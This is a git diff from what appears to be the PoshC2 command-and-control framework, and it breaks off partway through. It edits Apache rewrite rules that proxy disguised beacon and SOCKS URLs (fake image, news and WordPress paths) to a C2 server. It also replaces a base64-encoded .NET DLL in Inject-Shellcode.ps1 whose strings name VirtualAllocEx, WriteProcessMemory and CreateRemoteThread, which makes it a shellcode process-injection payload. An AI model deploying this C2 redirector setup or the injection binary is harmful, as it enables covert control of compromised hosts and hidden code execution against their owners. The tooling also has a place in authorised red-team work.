diff --git a/C2-Server.ps1 b/C2-Server.ps1 index 5dac483..92159bf 100644 --- a/C2-Server.ps1 +++ b/C2-Server.ps1 @@ -479,8 +479,8 @@ netsh http add sslcert ipport=0.0.0.0:443 certhash=REPLACE `"appid={00112233-445 RewriteEngine On Define PoshC2 Define SharpSocks -RewriteRule ^/webapp/static(.*) $uri`${PoshC2}/webapp/static`$1 [NC,P] -RewriteRule ^/connect(.*) $uri`${PoshC2}/connect`$1 [NC,P] +RewriteRule ^/webapp/static(.*) $uri`${PoshC2}/webapp/static`$1 [NC,L,P] +RewriteRule ^/connect(.*) $uri`${PoshC2}/connect`$1 [NC,L,P] "@ $customurldef = "No" $customurl = Read-Host -Prompt "[3a] Do you want to customize the beacon URLs from the default? [No]" @@ -489,7 +489,7 @@ RewriteRule ^/connect(.*) $uri`${PoshC2}/connect`$1 [NC,P] $urls = @() do { $input = (Read-Host "Please enter the URLs you want to use, enter blank entry to finish: images/site/content") - if ($input -ne '') {$urls += "`"$input`""; $apache += "`nRewriteRule ^/$input(.*) $uri`${PoshC2}/$input`$1 [NC,P]"} + if ($input -ne '') {$urls += "`"$input`""; $apache += "`nRewriteRule ^/$input(.*) $uri`${PoshC2}/$input`$1 [NC,L,P]"} } until ($input -eq '') [string]$urlstring = $null @@ -500,15 +500,15 @@ RewriteRule ^/connect(.*) $uri`${PoshC2}/connect`$1 [NC,P] RewriteEngine On Define PoshC2 Define SharpSocks -RewriteRule ^/connect(.*) $uri`${PoshC2}/connect`$1 [NC,P] -RewriteRule ^/images/static/content/(.*) $uri`${PoshC2}/images/static/content/`$1 [NC,P] -RewriteRule ^/news/(.*) $uri`${PoshC2}/news/`$1 [NC,P] -RewriteRule ^/webapp/static/(.*) $uri`${PoshC2}/webapp/static/`$1 [NC,P] -RewriteRule ^/images/prints/(.*) $uri`${PoshC2}/images/prints/`$1 [NC,P] -RewriteRule ^/wordpress/site/(.*) $uri`${PoshC2}/wordpress/site/`$1 [NC,P] -RewriteRule ^/true/images/77/(.*) $uri`${PoshC2}/true/images/77/`$1 [NC,P] -RewriteRule ^/holdings/office/images/(.*) $uri`${PoshC2}/holdings/office/images/`$1 [NC,P] -RewriteRule ^/steam(.*) $uri`${PoshC2}/steam`$1 [NC,P] +RewriteRule ^/connect(.*) $uri`${PoshC2}/connect`$1 [NC,L,P] +RewriteRule ^/images/static/content/(.*) $uri`${PoshC2}/images/static/content/`$1 [NC,L,P] +RewriteRule ^/news/(.*) $uri`${PoshC2}/news/`$1 [NC,L,P] +RewriteRule ^/webapp/static/(.*) $uri`${PoshC2}/webapp/static/`$1 [NC,L,P] +RewriteRule ^/images/prints/(.*) $uri`${PoshC2}/images/prints/`$1 [NC,L,P] +RewriteRule ^/wordpress/site/(.*) $uri`${PoshC2}/wordpress/site/`$1 [NC,L,P] +RewriteRule ^/true/images/77/(.*) $uri`${PoshC2}/true/images/77/`$1 [NC,L,P] +RewriteRule ^/holdings/office/images/(.*) $uri`${PoshC2}/holdings/office/images/`$1 [NC,L,P] +RewriteRule ^/steam(.*) $uri`${PoshC2}/steam`$1 [NC,L,P] "@ } @@ -528,11 +528,11 @@ RewriteRule ^/steam(.*) $uri`${PoshC2}/steam`$1 [NC,P] $socksurlstring = '"sitemap/api/push","visitors/upload/map","printing/images/bin/logo","update/latest/traffic","saml/stats/update/push"' $apache += @" -RewriteRule ^/sitemap/api/push(.*) $uri`${SharpSocks}/sitemap/api/push`$1 [NC,P] -RewriteRule ^/visitors/upload/map(.*) $uri`${SharpSocks}/visitors/upload/map`$1 [NC,P] -RewriteRule ^/printing/images/bin/logo(.*) $uri`${SharpSocks}/printing/images/bin/logo`$1 [NC,P] -RewriteRule ^/update/latest/traffic(.*) $uri`${SharpSocks}/update/latest/traffic`$1 [NC,P] -RewriteRule ^/saml/stats/update/push(.*) $uri`${SharpSocks}/saml/stats/update/push`$1 [NC,P] +RewriteRule ^/sitemap/api/push(.*) $uri`${SharpSocks}/sitemap/api/push`$1 [NC,L,P] +RewriteRule ^/visitors/upload/map(.*) $uri`${SharpSocks}/visitors/upload/map`$1 [NC,L,P] +RewriteRule ^/printing/images/bin/logo(.*) $uri`${SharpSocks}/printing/images/bin/logo`$1 [NC,L,P] +RewriteRule ^/update/latest/traffic(.*) $uri`${SharpSocks}/update/latest/traffic`$1 [NC,L,P] +RewriteRule ^/saml/stats/update/push(.*) $uri`${SharpSocks}/saml/stats/update/push`$1 [NC,L,P] "@ } diff --git a/Modules/Inject-Shellcode.ps1 b/Modules/Inject-Shellcode.ps1 index 3884dae..a7f8841 100644 --- a/Modules/Inject-Shellcode.ps1 +++ b/Modules/Inject-Shellcode.ps1 @@ -20,7 +20,7 @@ Inject-Shellcode -x86 -Shellcode (GC C:\Temp\Shellcode.bin -Encoding byte) -Proc #> -$p = "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LgBLAB8BLgBTABkBLgBbABkBLgBjADcBLgBrAGEBYwBzAF8AgwBzAF8AowBzAF8AMQCCAJIDAQAAAQMAJQUBAAABBQCDAQEAAAEHAEIFAQAAAQkANAUBAAABCwDHBAIAAAENANMEAgAAAQ8AqQECAAABEQCeAQEAAAETAGgBAQAAARUAdgEBAASAAAABAAAAAAAAAAAAAAAAABQFAAACAAAAAAAAAAAAAAAaAD0BAAAAAAMAAgAEAAIABQACAAAAAGtlcm5lbDMyADxNb2R1bGU+AEVYRUNVVEVfUkVBRABTVVNQRU5EX1JFU1VNRQBURVJNSU5BVEUASU1QRVJTT05BVEUARVhFQ1VURV9SRUFEV1JJVEUARVhFQ1VURQBSRVNFUlZFAFdSSVRFX1dBVENIAFBIWVNJQ0FMAFNFVF9USFJFQURfVE9LRU4AU0VUX0lORk9STUFUSU9OAFFVRVJZX0lORk9STUFUSU9OAERJUkVDVF9JTVBFUlNPTkFUSU9OAFRPUF9ET1dOAExBUkdFX1BBR0VTAE5PQUNDRVNTAFBST0NFU1NfQUxMX0FDQ0VTUwBSRVNFVABDT01NSVQAR0VUX0NPTlRFWFQAU0VUX0NPTlRFWFQAUkVBRE9OTFkARVhFQ1VURV9XUklURUNPUFkAdmFsdWVfXwBtc2NvcmxpYgBscFRocmVhZElkAGR3VGhyZWFkSWQAZHdQcm9jZXNzSWQAU3VzcGVuZFRocmVhZABSZXN1bWVUaHJlYWQAQ3JlYXRlUmVtb3RlVGhyZWFkAGhUaHJlYWQAT3BlblRocmVhZABDbG9zZUhhbmRsZQBiSW5oZXJpdEhhbmRsZQBmbEFsbG9jYXRpb25UeXBlAEd1aWRBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRlAEFzc2VtYmx5VGl0bGVBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAQXNzZW1ibHlGaWxlVmVyc2lvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbmZpZ3VyYXRpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBGbGFnc0F0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAZHdTdGFja1NpemUAblNpemUAZHdTaXplAEdVQVJEX01vZGlmaWVyZmxhZwBOT0NBQ0hFX01vZGlmaWVyZmxhZwBXUklURUNPTUJJTkVfTW9kaWZpZXJmbGFnAExlbmd0aABrZXJuZWwzMi5kbGwASW5qZWN0LmRsbABGaWxsAFN5c3RlbQBFbnVtAGxwTnVtYmVyT2ZCeXRlc1dyaXR0ZW4AcERlc3RpbmF0aW9uAFN5c3RlbS5SZWZsZWN0aW9uAE1lbW9yeVByb3RlY3Rpb24AbHBCdWZmZXIAbHBQYXJhbWV0ZXIALmN0b3IAU3lzdGVtLkRpYWdub3N0aWNzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5Db21waWxlclNlcnZpY2VzAERlYnVnZ2luZ01vZGVzAGxwVGhyZWFkQXR0cmlidXRlcwBkd0NyZWF0aW9uRmxhZ3MAVGhyZWFkQWNjZXNzAGR3RGVzaXJlZEFjY2VzcwBoUHJvY2VzcwBPcGVuUHJvY2VzcwBHZXRDdXJyZW50UHJvY2VzcwBscEJhc2VBZGRyZXNzAGxwQWRkcmVzcwBscFN0YXJ0QWRkcmVzcwBoT2JqZWN0AEluamVjdABmbFByb3RlY3QAVmlydHVhbEFsbG9jRXgAUnRsRmlsbE1lbW9yeQBXcml0ZVByb2Nlc3NNZW1vcnkAAAAAAAAAADOd9irKpehGm2m3kmuVLsgABCABAQgDIAABBSABARERBCABAQ4EIAEBAgi3elxWGTTgiQT/Dx8ABAAQAAAEACAAAAQAAAgABAAAACAEAABAAAQAABAABAAAIAAEEAAAAAQgAAAABEAAAAAEgAAAAAQBAAAABAIAAAAEBAAAAAQIAAAABAABAAAEAAIAAAQABAAAAQICBgkDBhEMAwYREAIGCAMGERQIAAUYGBgYCQkKAAcYGBgJGBgJGAgABQIYGBgIGAYAAwEYGAUGAAMYCQIJAwAAGAQAAQIYBwADGBEUAgkEAAEJGAQAAQgYCAEACAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQgBAAIAAAAAAAsBAAZJbmplY3QAAAUBAAAAABcBABJDb3B5cmlnaHQgwqkgIDIwMTcAACkBACRiZDE0OWI0My02ZmQ2LTQxZjAtYTRlMS1mMGJjZWI4NmU3ZDEAAAwBAAcxLjAuMC4wAAAAAAAAAACINzJaAAAAAAIAAAAcAQAAwCwAAMAOAABSU0RTa0IUqhSl90OSZkFCUYgU8gEAAABDOlxVc2Vyc1xhZG1pblxzb3VyY2VccmVwb3NcSW5qZWN0XEluamVjdFxvYmpcUmVsZWFzZVxJbmplY3QucGRiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQuAAAAAAAAAAAAAB4uAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQLgAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAAD/JQAgABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABABAAAAAYAACAAAAAAAAAAAAAAAAAAAABAAEAAAAwAACAAAAAAAAAAAAAAAAAAAABAAAAAABIAAAAWEAAAAwDAAAAAAAAAAAAAAwDNAAAAFYAUwBfAFYARQBSAFMASQBPAE4AXwBJAE4ARgBPAAAAAAC9BO/+AAABAAAAAQAAAAAAAAABAAAAAAA/AAAAAAAAAAQAAAACAAAAAAAAAAAAAAAAAAAARAAAAAEAVgBhAHIARgBpAGwAZQBJAG4AZgBvAAAAAAAkAAQAAABUAHIAYQBuAHMAbABhAHQAaQBvAG4AAAAAAAAAsARsAgAAAQBTAHQAcgBpAG4AZwBGAGkAbABlAEkAbgBmAG8AAABIAgAAAQAwADAAMAAwADAANABiADAAAAAaAAEAAQBDAG8AbQBtAGUAbgB0AHMAAAAAAAAAIgABAAEAQwBvAG0AcABhAG4AeQBOAGEAbQBlAAAAAAAAAAAANgAHAAEARgBpAGwAZQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AAAAAAEkAbgBqAGUAYwB0AAAAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAuADAAAAA2AAsAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEkAbgBqAGUAYwB0AC4AZABsAGwAAAAAAEgAEgABAEwAZQBnAGEAbABDAG8AcAB5AHIAaQBnAGgAdAAAAEMAbwBwAHkAcgBpAGcAaAB0ACAAqQAgACAAMgAwADEANwAAACoAAQABAEwAZQBnAGEAbABUAHIAYQBkAGUAbQBhAHIAawBzAAAAAAAAAAAAPgALAAEATwByAGkAZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0AZQAAAEkAbgBqAGUAYwB0AC4AZABsAGwAAAAAAC4ABwABAFAAcgBvAGQAdQBjAHQATgBhAG0AZQAAAAAASQBuAGoAZQBjAHQAAAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAMAAAAMD4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" +$p = "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CQBAAFoACQBEAF8ACQBIAGQACQBMAGkACQBQADIACQBUAG4ACQBYAHMACQBcAHgACQBgAH0ACABoAGQACABsAGkACABwAG4ACAB0AFAACAB4AFUACAB8AFoACACAAF8ACACEAHMACACIAHgALgALAPYALgATAP8ALgAbAB4BLgAjACcBLgArADMBLgAzADMBLgA7ADMBLgBDACcBLgBLADkBLgBTADMBLgBbADMBLgBjAFEBLgBrAHsBYwBzAGQAgwBzAGQAowBzAGQAMQCCACgEAQA1BAABAwD2BQEAAAEFAKMBAQAAAQcAEwYBAAABCQAFBgEAAAELAIAFAQAAAQ0AjAUBAAABDwD9AQEAAAERAL4BAQAAARMAiAEBAAABFQCWAQEABgEXAO0BAQBDARkAngUCAAABGwDJAQMABIAAAAEAAAAAAAAAAAAAAAAA5QUAAAIAAAAAAAAAAAAAABoAVAEAAAAAAwACAAQAAgAFAAIAAAAAAABrZXJuZWwzMgA8TW9kdWxlPgBFWEVDVVRFX1JFQUQAU1VTUEVORF9SRVNVTUUAVEVSTUlOQVRFAElNUEVSU09OQVRFAFBBR0VfUkVBRFdSSVRFAEVYRUNVVEVfUkVBRFdSSVRFAEVYRUNVVEUATUVNX1JFU0VSVkUAV1JJVEVfV0FUQ0gAUEhZU0lDQUwAU0VUX1RIUkVBRF9UT0tFTgBTRVRfSU5GT1JNQVRJT04AUVVFUllfSU5GT1JNQVRJT04ARElSRUNUX0lNUEVSU09OQVRJT04AVE9QX0RPV04ATEFSR0VfUEFHRVMATk9BQ0NFU1MAUFJPQ0VTU19BTExfQUNDRVNTAFJFU0VUAE1FTV9DT01NSVQAR0VUX0NPTlRFWFQAU0VUX0NPTlRFWFQAUkVBRE9OTFkARVhFQ1VURV9XUklURUNPUFkAdmFsdWVfXwBtc2NvcmxpYgBscFRocmVhZElkAGR3VGhyZWFkSWQAZHdQcm9jZXNzSWQAQ2xpZW50SWQAU3VzcGVuZFRocmVhZABSZXN1bWVUaHJlYWQAQ3JlYXRlUmVtb3RlVGhyZWFkAGhUaHJlYWQAT3BlblRocmVhZABSdGxDcmVhdGVVc2VyVGhyZWFkAENyZWF0ZVN1c3BlbmRlZABHZXRNb2R1bGVIYW5kbGUAQ2xvc2VIYW5kbGUAYkluaGVyaXRIYW5kbGUAaE1vZHVsZQBwcm9jTmFtZQBscE1vZHVsZU5hbWUAZmxBbGxvY2F0aW9uVHlwZQBHdWlkQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGUAQXNzZW1ibHlDb25maWd1cmF0aW9uQXR0cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUARmxhZ3NBdHRyaWJ1dGUAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBBc3NlbWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlDb21wYW55QXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAENvbW1pdHRlZFN0YWNrU2l6ZQBNYXhpbXVtU3RhY2tTaXplAGR3U3RhY2tTaXplAG5TaXplAGR3U2l6ZQBHVUFSRF9Nb2RpZmllcmZsYWcATk9DQUNIRV9Nb2RpZmllcmZsYWcAV1JJVEVDT01CSU5FX01vZGlmaWVyZmxhZwBMZW5ndGgAa2VybmVsMzIuZGxsAG50ZGxsLmRsbABJbmplY3QuZGxsAEZpbGwAU3lzdGVtAEVudW0AbHBOdW1iZXJPZkJ5dGVzV3JpdHRlbgBwRGVzdGluYXRpb24AU3lzdGVtLlJlZmxlY3Rpb24ATWVtb3J5UHJvdGVjdGlvbgBscEJ1ZmZlcgBscFBhcmFtZXRlcgAuY3RvcgBUaHJlYWRTZWN1cml0eURlc2NyaXB0b3IAU3lzdGVtLkRpYWdub3N0aWNzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5Db21waWxlclNlcnZpY2VzAERlYnVnZ2luZ01vZGVzAGxwVGhyZWFkQXR0cmlidXRlcwBkd0NyZWF0aW9uRmxhZ3MAVGhyZWFkQWNjZXNzAGR3RGVzaXJlZEFjY2VzcwBoUHJvY2VzcwBPcGVuUHJvY2VzcwBHZXRDdXJyZW50UHJvY2VzcwBHZXRQcm9jQWRkcmVzcwBscEJhc2VBZGRyZXNzAGxwQWRkcmVzcwBscFN0YXJ0QWRkcmVzcwBaZXJvQml0cwBoT2JqZWN0AEluamVjdABmbFByb3RlY3QAVmlydHVh